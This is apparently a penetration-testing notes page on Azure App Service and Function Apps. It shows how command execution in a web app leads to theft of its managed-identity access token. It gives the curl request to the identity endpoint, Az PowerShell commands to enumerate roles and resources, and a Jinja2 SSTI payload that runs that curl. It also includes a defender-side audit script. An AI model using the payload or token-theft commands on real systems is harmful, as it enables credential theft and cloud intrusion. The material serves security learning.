# Azure App Service

Azure App Service is an HTTP-based service for hosting web applications, REST APIs, and mobile back ends. It supports both Windows and Linux environments.

<figure><img src="https://3347686964-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fu7zwkkeRzjx9PZGhfY9D%2Fuploads%2FUnvMFYCkyckR1An7E57X%2Fapp-service_image_val2.avif?alt=media&#x26;token=01af7645-c1b9-402e-8b67-545d5ab89f4d" alt=""><figcaption></figcaption></figure>

### Isolation

{% hint style="info" %}
Each app runs inside a sandbox but isolation depends upon App Service plans
{% endhint %}

* Apps in the Free and Shared tiers run on shared VMs
* Apps in the Standard and Premium tiers run on dedicated VMs

### App Service Abuse

While App Service provides some security features by default (sandboxing/isolation), vulnerabilities in the deployed code remain exploitable. The classic web app vulnerabilities, such as SQL injection and OS command injection, do not disappear.

### Managed Identity

If a vulnerability in an App Service app is abused to gain command execution, the resulting privileges are those of the low-privilege worker process. But if the app uses a Managed Identity, that identity may hold interesting permissions on other Azure resources.

<figure><img src="https://3347686964-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fu7zwkkeRzjx9PZGhfY9D%2Fuploads%2FYQuSrU7v7KcAleMtuxv5%2Farchitecture.png?alt=media&#x26;token=2b526605-f698-4231-b054-bb8796a201b7" alt=""><figcaption></figcaption></figure>

Once you have command execution, run `env` to check whether the `IDENTITY_HEADER` and `IDENTITY_ENDPOINT` variables are set. If they are, the app has a managed identity.

<figure><img src="https://3347686964-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fu7zwkkeRzjx9PZGhfY9D%2Fuploads%2FNlEGoZzOnOBYI4zgyAOE%2Fimage.png?alt=media&#x26;token=a5ddf29c-70ff-49c8-8f29-38ed6d2d5eb5" alt=""><figcaption></figcaption></figure>

Now, to get an access\_token for the app service, use the following command:

{% code lineNumbers="true" %}

```bash
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H "secret:$IDENTITY_HEADER"
```

{% endcode %}

<figure><img src="https://3347686964-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fu7zwkkeRzjx9PZGhfY9D%2Fuploads%2FupJveYvtUeTafpR0NxAE%2Fimage.png?alt=media&#x26;token=340a8e34-6660-4c9e-905d-1b45ca3c9243" alt=""><figcaption></figcaption></figure>

### Check App Privileges

Once you have an access\_token for the app service, use it to authenticate with the Az PowerShell module:

```powershell
# $token holds the access_token obtained in the previous step
Connect-AzAccount -AccessToken $token -AccountId 064aaf57-30af-41f0-840a-xxxxx
```

Now, to check which role assignments our token has, run:

```powershell
Get-AzRoleAssignment
```

To list the resources visible to the token, run:

```powershell
Get-AzResource
```
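The same checks can be run from the other side. The following Az PowerShell script is an added defender-side example (not from the original page): instead of running inside a compromised app, an administrator runs it against the subscription to list every App Service and Function App, whether it has a system-assigned managed identity, and which role assignments and scopes that identity holds, so over-privileged identities are found before an app vulnerability is. It assumes the Az.Websites and Az.Resources modules are installed and `Connect-AzAccount` has already been run with an account that can read role assignments.

```powershell
# Added audit example, not from the original page. Lists every App Service /
# Function App site in the current subscription, whether it has a system-assigned
# managed identity, and the role assignments that identity holds.
# Assumes: Az.Websites and Az.Resources installed, Connect-AzAccount already run.
function Get-AppServiceIdentityReport {
    [CmdletBinding()]
    param()

    # Get-AzWebApp returns every Microsoft.Web/sites resource, so Function Apps
    # (Kind contains "functionapp") appear alongside ordinary web apps.
    foreach ($site in Get-AzWebApp) {
        $row = [ordered]@{
            App           = $site.Name
            ResourceGroup = $site.ResourceGroup
            Kind          = $site.Kind
            IdentityType  = 'None'
            Role          = $null
            Scope         = $null
        }
        $principalId = $site.Identity.PrincipalId
        if (-not $principalId) {
            # No system-assigned identity: command execution here yields only the
            # worker-process privileges described above, nothing on the Azure side.
            # (User-assigned identities live in $site.Identity.UserAssignedIdentities
            # and are not covered by this check.)
            [pscustomobject]$row
            continue
        }
        $row.IdentityType = [string]$site.Identity.Type
        $assignments = Get-AzRoleAssignment -ObjectId $principalId -ErrorAction SilentlyContinue
        if (-not $assignments) {
            # Identity exists but holds no role: the default "no read access" state.
            $row.Role = '(none)'
            [pscustomobject]$row
            continue
        }
        foreach ($ra in $assignments) {
            $row.Role  = $ra.RoleDefinitionName
            $row.Scope = $ra.Scope
            [pscustomobject]$row   # each cast snapshots the current values
        }
    }
}

# Review broad scopes first: a subscription- or resource-group-wide role on an
# app's identity is what turns an app compromise into access to other resources.
Get-AppServiceIdentityReport |
    Where-Object { $_.Role -and $_.Role -ne '(none)' } |
    Sort-Object Scope, App |
    Format-Table App, Kind, IdentityType, Role, Scope -AutoSize
```

Rows with `Role = (none)` are identities in the default state the warning below describes; rows whose Scope is the whole subscription are the ones to scope down first.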

### SSTI payload

If you find an app vulnerable to SSTI (Jinja2), use this payload to get the app's access\_token:

```jinja2
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read() }}
```

### Function App

A function app (also called Azure Functions) is Azure's 'serverless' solution for running code. A function app is meant to react to an event such as:

* An HTTP trigger
* Processing a file upload
* Running code at a scheduled time, and more

Function apps also support managed identities!

{% hint style="info" %}
It looks a lot like AWS Lambda
{% endhint %}

When you get the following error, it means the access\_token has no access to any resources:

<figure><img src="https://3347686964-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fu7zwkkeRzjx9PZGhfY9D%2Fuploads%2FY4CBADE3zw0iCbUXtiZf%2Fimage.png?alt=media&#x26;token=13cd68b3-7bf2-462f-a53f-55cf0895f27f" alt=""><figcaption></figcaption></figure>

{% hint style="warning" %}
By default, managed identities (service principals) have no read access at all!
{% endhint %}

In this case, a tool like AzureHound comes in handy.
